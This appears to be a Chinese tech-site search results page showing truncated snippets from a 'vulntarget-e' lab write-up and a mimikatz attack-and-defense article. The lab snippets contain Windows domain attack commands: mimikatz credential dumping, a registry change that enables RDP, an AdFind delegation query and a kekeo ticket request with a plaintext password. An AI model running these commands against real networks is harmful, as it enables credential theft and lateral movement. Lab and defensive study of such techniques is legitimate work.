首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往
您找到你想要的搜索结果了吗?
是的
没有找到

vulntarget-e

sam.hive /system:system.hive 也可以通过cs生成木马来实现上线 信息收集 利用hashdump或者猕猴桃抓取密码 最后解码得到管理员和普通用户密码:administrator/win2008...Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f 成功进入远程桌面 约束性委派攻击 上传mimikatz、ADFind、kekeo,探测win2008...是否存在约束委派 mimikatz获取密码:win2008/qweASD123 # 提升权限 privilege::debug # 抓取密码 sekurlsa::logonpasswords 查找约束性委派主机...,可以发现第三台主机win2008对第四台主机10.10的CIFS服务存在约束委派 AdFind.exe -h 10.0.10.128 -u win2008 -up qweASD123 -b "DC=...的TGT # 使用kekeo进行一个票据的请求 tgt::ask /user:win2008 /domain:vulntarget.com /password:qweASD123 /ticket:ash.kirbi

77920

Mimikatz 攻防杂谈

但是在 win2008 之前的系统上还是能抓到密码的。一般情况下,只要有本地管理员权限就能从内存中抓出密码。通常抓到密码之后就可以进行横向移动和提权。...默认在 win2008 之前是默认启用的。那么攻击者就能从中获取到明文。 但是在 win2008 之后的系统上,默认是关闭的。...如果在 win2008 之前的系统上打了 KB2871997 补丁,那么就可以去启用或者禁用 WDigest,配置如下键值: HKEY_LOCAL_MACHINE\System\CurrentControlSet...这是在 win2012 之后引入的一个新的安全组(win2008 之前的系统打了 KB2871997 补丁也会增加这个安全组)。...win7/win2008 想用这个功能就得打 KB2871997、KB2973351。这项功能的使用需要客户端和服务端相互配合。在服务端开启的方法是在注册表添加如下键值。

1.9K20
领券